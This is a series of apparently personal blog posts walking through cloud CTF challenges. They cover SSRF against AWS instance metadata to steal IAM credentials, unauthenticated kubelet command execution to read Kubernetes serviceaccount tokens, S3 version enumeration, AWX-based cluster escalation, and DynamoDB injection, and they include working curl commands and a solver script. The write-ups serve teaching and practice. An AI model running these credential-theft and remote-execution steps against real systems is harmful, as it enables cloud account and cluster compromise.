Well, we got response 401 Unauthorized which mean the metadata exist but we need some credentials to access that.

So, what kind of credentials we need to access metadata? Well, seems like our EC2 target using IMDSv2 that has authentication in it.

But, since we can do SSRF and there is no restriction http method we can use (look /proxy configuration below). It is easy for us to get that credentials.

So, all we need is just to do PUT request to http://169.254.169.254/latest/api/token with additional header X-aws-ec2-metadata-token-ttl-seconds. Here curl command to get the token.

curl -XPUT https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/api/token \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600"

and we got the token

Next try again to access the metadata using the token we just got. Here the curl command.

TOKEN="<token>"

curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/ \
-H "X-aws-ec2-metadata-token: $TOKEN"

It works now!

Let’s steal some aws credentials!

So, the credentials we looking for are stored in http://169.254.169.254/latest/meta-data/iam/security-credentials/<user> to know what user are exist in the EC2 just omit the <user>. Here curl command to steal aws credentials and also get region.

# To get region info
curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/placement/region \
-H "X-aws-ec2-metadata-token: $TOKEN"

# To list users
curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ \
-H "X-aws-ec2-metadata-token: $TOKEN"

# To retrieve aws credentials
curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368 \
-H "X-aws-ec2-metadata-token: $TOKEN"

Yeay, we got the credentials!

Alright, now we have everything we need. Let set all info and credentials to be use by aws cli.

export AWS_DEFAULT_REGION=<region>
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>

Then try to access the S3 bucket we know earlier.

aws s3 ls s3://challenge01-470f711

Yap, we can list objects inside the bucket.

We can see there is flag.txt object inside private/ directory. But, when try to download it we got forbidden. While we try to download hello.txt it return success.

As written in challenges description, there is restrict access to the bucket contents. So, maybe the bucket content only accessible through EC2 instance?

We can check the S3 bucket policy using command below.

aws s3api get-bucket-policy --bucket challenge01-470f711 --output text | jq .

The policy shown that it will deny all request to objects in /private if the request not come from vpce-0dfd8b6aa1642a057. Which mean we need to access the S3 bucket through EC2 instance.

Well, we can use SSRF to access s3 bucket content. But, how we pass the credentials to our SSRF request?

Luckily, there is something called presigned url that can embedded the credentials to the url. So, we can just pass that presigned url for our SSRF.

Let’s generate the presigned url then urlencode the generated url.

urlencode $(aws s3 presign s3://challenge01-470f711/private/flag.txt --expires-in 604800)

Then access with browser, Ta-da we got the flag!

Since the challenge still up and points still counted, i censored the flag. But, you can get it just by follow my solution. Well, just do some effort boys~ :D

But, if you lazy you can get the flag immediately using this script, lol XD

import boto3
from urllib.parse import quote_plus
import requests

# Get aws credentials from EC2 instance metadata
chall_url = "https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com"
proxy_url = chall_url + "/proxy?url="

# Get the token for the metadata service
ssrf_url = proxy_url + "http://169.254.169.254/latest/api/token"
headers = {
    "X-aws-ec2-metadata-token-ttl-seconds": "21600"
}

imds_api_token = requests.put(ssrf_url, headers=headers, timeout=5)

wheaders = {
    "X-aws-ec2-metadata-token": imds_api_token.text
}

# Get the AWS credentials from the metadata service (IMDSv2)
ssrf_url = proxy_url + "http://169.254.169.254/latest/meta-data/iam/security-credentials/challenge01-5592368"
imds_creds = requests.get(ssrf_url, headers=headers, timeout=5)
creds_json = imds_creds.json()

# Set the AWS credentials
s3_client = boto3.client('s3', region_name='us-east-1',
                            aws_access_key_id=creds_json['AccessKeyId'],
                            aws_secret_access_key=creds_json['SecretAccessKey'],
                            aws_session_token=creds_json['Token'])

presigned_url = s3_client.generate_presigned_url(
    ClientMethod='get_object',
    Params={'Bucket': 'challenge01-470f711', 'Key': 'private/flag.txt'},
    HttpMethod='GET',
    ExpiresIn=3600  # URL expires in 1 hour
)

# Make the request
get_flag_url = proxy_url + quote_plus(presigned_url)
response = requests.get(get_flag_url, timeout=5)

print(response.text)

After solve the challenge, you will got the certificate like this.

Alright, that’s it. See you next month with new challenge! :D

Reference:

• https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785

• https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html

• https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html

Cover Illustration source https://www.pixiv.net/en/artworks/104822829

Hello all, let’s continue to my second challenge called That Day. This challenge is about get access to kubernetes cluster. Here the challenge description

But perhaps you hate a thing and it's good for you And perhaps you love a thing and it's bad for you :')

http://foryou.lychnobyte.my.id

So, this challenge was once deployed in VPS and attached with my domain but now the challenge is down. If you wanna try to solve it you need to deploy the cluster and service yourself.

All you need is ubuntu 20.04 (or later version) VM with specs 2 vcpu and 2 GB ram. Then follow steps on deploy_notes.md after that deploy manifest deploy_sites.yaml with k create -f deploy_sites.yaml.

https://github.com/afmaghribi/BrokenHeartEdition/tree/master/Cloud/That_Day/deploy

Well, i use microk8s here for simplicity to deploy single node kubernetes cluster. You can deploy kubernetes cluster with another tools but i things it’s too much just for simple service.

After all set you can add static domain to /etc/host on your pc to resolve vm ip to foryou.lychnobyte.my.id or you can directly access your vm ip address in browser. Here the sites page look like.

I know, it is too cringe like asdfafgdafgsdag >_< sorry -_-”

Anyway, back to challenge objective and assume we don’t know what service are running in vm. Again it is just a static website so we need to scan the ip vm to know what services running on vm using nmap

nmap -sS -sV -Pn -p- -T5 -n foryou.lychnobyte.my.id

Wait a while and here the result look like

Many ports open but we know that in Operator challenge here port 10250 are exposed by kubelet service. So, it is most likely the vm is kubernetes node and for apiserver port commonly use 6443 or 16443.

Let’s access apiserver using browser and we got forbidden response. But, confirm that it is kubernetes cluster apiserver endpoint.

Well, so we don’t have access directly to the apiserver port but what about access in kubelet port?

Well, it is only response 404 not found not forbidden. Then try to list running pods using /pods/ endpoint

Yeah, we got list of pods along with details metadata for each pod.

Alright, next step is as usual. We retrieve serviceaccoount token inside the pod then use it as authentication to access the kubernetes cluster.

First, lets find good pod candidate that probably has high serviceaccount privilege.

Pods situs-diriku-f9b4bdc98-mp7dk seems a good candidate

Because the pods use custom serviceaccount name sa-diriku and has automountServiceAccountToken set to true

So, how to retrieve the token inside pod? Well, kubelet has endpoint /run that can be use to run command inside desired pod. Here the pattern to remote command execution.

curl -XPOST -k \
https://${IP_ADDRESS}:10250/run/<namespace>/<pod>/<container> \
-d cmd="command to exec"

In our case we use we want to retrieve serviceaccount token, so this is our curl request.

curl -XPOST -k \
  https://foryou.lychnobyte.my.id:10250/run/jakarta/situs-diriku-f9b4bdc98-mp7dk/situs-diriku\
?cmd="cat%20/var/run/secrets/kubernetes.io/serviceaccount/token"

Successfully retrieve the serviceaccount token.

Now, we can use the token to access kubernetes cluster using kubectl. Check authorization of the token we have, don’t forget to specify namespace to jakarta because serviceaccount only has namespaced scope permission.

TOKEN="serviceaccount token"

kubectl --insecure-skip-tls-verify=true --server https://foryou.lychnobyte.my.id:16443 --token $TOKEN --namespace jakarta auth can-i --list

Well, we have permission to list and get object secrets.

Then we can just list and get the secrets, don’t forget to decode as base64 to retrieve the plaintext.

That it we got the flag!

Flag: TCP1P{4nd_c3l3br4t3_y0ur_h4pp13st_d4ys_th3r3_:')}

Reference:

1. https://faun.pub/attacking-kubernetes-clusters-using-the-kubelet-api-abafc36126ca

2. https://microk8s.io/docs/services-and-ports

Cover Illustration source https://www.pixiv.net/en/artworks/97570152

Hello all, i will continue write about cloud ctf challenges. But, instead of solving challenges from ctf competition out there. In this post i talk about my own challenges. Well, the challenges was listed on one of ctf playground platform but now the platform itself is closed so i decide to write about it.

So, first challenge is called Last Forever which is about aws s3 bucket. Here the challenge description.

I have erased all my memories of you. But, why are you still in the deepest part of my heart? :')

http://forever.lychnobyte.my.id

Well, the challenge is still up and maybe you can try to solve it by yourself before reading this post. I will give source code and how to deploy the challenge later in this post.

Let’s start to solve this challenge.

First open the link provided in description with browser, here the page we got.

Nothing special with the website itself just a static page. Since it is cloud challenge it might useful if we use dig to know what cloud provider that use in this challenge.

From dig answer section we can see that website are served as static website that provided by aws s3 bucket. Because it using CNAME s3-website.<region>.amazonaws.com.

Since it is static website the bucket should has public access to list objects. So, we can just go to http://forever.lychnobyte.my.id.s3.us-east-2.amazonaws.com to list all objects in the bucket.

As we can see there is several objects, the unusual objects are memories.txt and myheart.txt.

Try open the memories.txt object, seems like we need to open myheart.txt

While open myheart.txt object, it mentioned deepest.

So i guess it is related to bucket versioning in aws s3 bucket. It is a feature to enabled bucket to still stored the old version of object.

Well, we can list the old version by just append /?versions in the bucket url.

Well, there is many versions available for object myheart.txt. Let’s try to open one of old version myheart.txt. The link pattern to open object in certain version is by append <object-path>?versionId=<version-id>.

Hmm, it is only show 1 letter. So, i assume to get whole flag we need to retrieve all letters then combine it. Because manual works is so boring, let’s use some script solver. Here the solver i use

import requests
import xml.etree.ElementTree as ET

res = requests.get('http://forever.lychnobyte.my.id.s3.amazonaws.com/?versions')

root = ET.fromstring(res.text)

all_versions = []

for versions in root.findall('{http://s3.amazonaws.com/doc/2006-03-01/}Version'):
    version_id = versions.find('{http://s3.amazonaws.com/doc/2006-03-01/}VersionId').text
    file_name = versions.find('{http://s3.amazonaws.com/doc/2006-03-01/}Key').text
    if file_name == "myheart.txt":
        all_versions.append(version_id)

flag = ""

for version in all_versions[1:]:
    res = requests.get('http://forever.lychnobyte.my.id.s3.amazonaws.com/myheart.txt?versionId=' + version)
    flag += res.text.strip()

print(flag[::-1])

So, just run the solver then we got the flag.

Flag: TCP1P{jus7_l1k3_wh4t_1_s4id_y0u_4lw4ys_r3m4in5_h3r3_f0r3v3r_:')}

It just a simple challenge isn’t? :)

Well, you can see all source code for this challenge in my repository here https://github.com/afmaghribi/BrokenHeartEdition/tree/master/Cloud/Last_Forever

Since, the challenge is still up and bucket still exist if you want to deploy your own bucket you change the credentials and bucket name in main.tf file

https://github.com/afmaghribi/BrokenHeartEdition/blob/25a7da19f48a40ed346ce960d7dd30c110a7b14e/Cloud/Last_Forever/deploy/main.tf#L9C1-L20C1

provider "aws" {
  profile = "awscli"
  region  = "us-east-2"
  shared_credentials_files = ["/home/curiozan/.aws/credentials"] >> Change here
}

# S3 Bucket name

resource "aws_s3_bucket" "my_s3_bucket" {
  bucket = "forever.lychnobyte.my.id" >> Change here
}

Reference:

1. https://docs.aws.amazon.com/AmazonS3/latest/userguide/list-obj-version-enabled-bucket.html

2. https://docs.aws.amazon.com/id_id/AmazonS3/latest/userguide/RetrievingObjectVersions.html

Cover Illustration source https://www.pixiv.net/en/artworks/89193760

Alright, let’s continues to 2nd challenge called Operator. Here is the challenge description:

We have located Monkey Business operator blog where they are leaking personal informations. We would like you to break into their system and figure out a way to gain full control.

Just like previous challenge we only got an IP address. So i just running Nmap to scan the IP address to know what services are running and in which port.

The scan result show there is 6 open ports:

1. 22 - ssh

2. 80 - http

3. 3000 - ppp

4. 8443 - https (most likely kube api server)

5. 10250 - http (most likely kubelet)

6. 30080 - http nginx

Let’s explore each services one-by-one

1. 80 - Web server

Access from browser we got website page like this.

After check all posts on the website, there is one post that provide a link that leads to port 3000. Let’s visit that link.

2. 3000 - gogs (self-hosted git server)

The link that we found earlier leads us to git repository.

Since the repository itself seems not have useful information i tried to explore the gogs server to find another repository.

Yeah, there another repository named awx-operator

Explore the repository and i found a closed issue. That issue mentioned another repository called awx-k8s-config.

Then i open the repository and try to explore the files stored in the repository. Seems like the files stored in the repository are manifest file to deploy awx-operator in kubernetes. From commit history i found credentials for login to awx operator dashboard

3. 30080 - Awx dashboard

Login to awx dashboard using credentials we got before, here the dashboard look like.

Briefly, how awx work is awx will deploy pod in kubernetes cluster then make it as runner to to run ansible playbook. So, we can simple create our own ansible playbook to get kubernetes serviceaccount token that we can use to access kubernetes cluster.

First, we create new user and repository on gogs server. Then we stored our ansible playbook that print serviceaccount token that stored in file /var/run/secrets/kubernetes.io/serviceaccount/token inside the pod. Here the playbook that i use.

Then on awx dashboard we create new project that use our new repository as source control.

Then we create new job template for the project to run ansible playbook.

Then we run the job, but i got an error. Seems like the file that contain serviceaccount doesn’t exist in the runner pod.

After explore a while i found that the pod spec that deploy as runner has automountServiceAccountToken option set to false. We need to change that option to true. The configuration can found in Instance Group -> choose group -> customize pod configuration.

Then re-run the job we’ve created. Now finally we got the serviceaccount token.

Next we use that token to access the kubernetes cluster with kubectl.

When i tried to list pods running got error permission. Seems like our token doesn’t has such permission, since we use the default serviceaccount. Well we change it but first we need to know what serviceaccount that exist in the cluster. We can open awx-operator.yaml file in awx-k8-config repository to see that we can use awx-operator-controller-manager serviceaccount.

To make it our runner pod using that serviceaccount we need to set option serviceAccountName in pod configuration.

Re-run the job to get new token from new serviceaccount

Then try run kubectl using new token, here i check the permission we got.

Seems like now we can create new pod. Since the flag.txt file are stored in the host machine we can create pod that mount / host machine to the pod, so we can read the flag.txt. Here the pod manifest that i use.

Next just create the pod and exec shell inside pod then read the flag.txt file.

Reference:

• https://faun.pub/attacking-kubernetes-clusters-using-the-kubelet-api-abafc36126ca

• https://github.com/kubernetes/kubernetes/issues/2797

Cover Illustration source https://www.pixiv.net/en/artworks/112523817

Hello all, so i just decide to start blogging again but i don’t know what to write in this blog. So i just rewrite my old blog post into english with some adjustment and revision. :D

Back in 2022 i participated alone in HTB Bussiness CTF just for fun because i curious with their Cloud category and it’s only 2 challenge in that category, lol.

Let’s start with first challenge called Trade, here the challenge description:

With increasing breaches there has been equal increased demand for exploits and compromised hosts. Dark APT group has released an online store to sell such digital equipment. Being part of defense operations can you help disrupting their service ?

Anyway before start to solving the challenge as a context, to access the challenge i need to connect vpn that HTB platform provided. That’s why the AWS endpoint here kinda different that usual one. I assumed they deploy AWS-like services using tools called localstack in their own server.

This challenge only give us an IP address which service running without any further explanation what kind of service are running. So, my first step is running Nmap to scan the IP address to know what services are running and in which port.

As we can see there is 3 ports open with 3 different services running, ssh server,http server and subversion

Let’s dig dive each services running.

1. Port 80 - Web server

Open the given Ip address in the browser then we got this login page, just usual login page nothing special

2. Port 3690 - Subversion

Next, access to subversion using svn client. Fyi, subversion is version control system just like git which is tools that usually use to control our code in repository. So, the idea here maybe we can dump the code that running in http server to get some credentials.

First, we list the repository that available in subversion then we clone the repository to our local. We found /store repository then clone to our local. We got 3 files README.md, dynamo.py and sns.py

In dynamo.py file there is hard-code username and password to store in dynamodb, i assume we can use this credentials to login to login page we found earlier.

So, i tried to login using the credentials i just found it works. But, there is another authentication that ask for our OTP.

Well, there is another file called sns.py but nothing interesting there. But, since it is stored in version control system maybe we can found something interesting in previous version. Check logs of the repository we found there is several modification, then try to revert one by one to check previous code version.

When back to revision 2, there is hard-code AWS access and secret key.

So, using those keys we can auth to AWS-like services. To setup i just need to add hostname cloud.htb with challenge IP address in /etc/hosts then use cloud.htb as our endpoint-url. Then try to list what topics that available in our account.

Well, there is only 1 topic called otp. We need to subscribe to otp topic so we can continue our login. Since the service are running inside HTB network easiest way to subscribe is using http endpoint.

The setup is simple, we just need to open port 80 in our vpn IP address in this case i’m using nc command so i can see raw http request. After setup done, i just subscribe the otp topic using command below:

Then, try to login again and wait the otp hit our http endopoint, get the otp code and continue our login.

Here the website appearance after we success login.

After explore a while, i found search page that we can receive some input string. After some trial i got an error message that reveal some information while i input ”.

Look like this input handled directly to dynamodb. So, i just googled for maybe some dynamodb injection or something to dump some information from db.

Well, found that we can do some injection to dump all data inside dynamodb and here the input i use to dump all data.

So, we can see all data inside the database. But i still have no idea what these credential used for.

After a while i guess it is credentials to access the machine directly using ssh since it is the only services we not touching yet.

Finally, when i ssh using username mario the authentication success then i just need to read flag.txt file. Yeaaay first challenge solved!!!

Reference:

• https://book.hacktricks.xyz/network-services-pentesting/3690-pentesting-subversion-svn-server

• https://tutorgeeks.blogspot.com/2019/11/publicly-exposed-aws-sns-topics.html

• https://medium.com/appsecengineer/dynamodb-injection-1db99c2454ac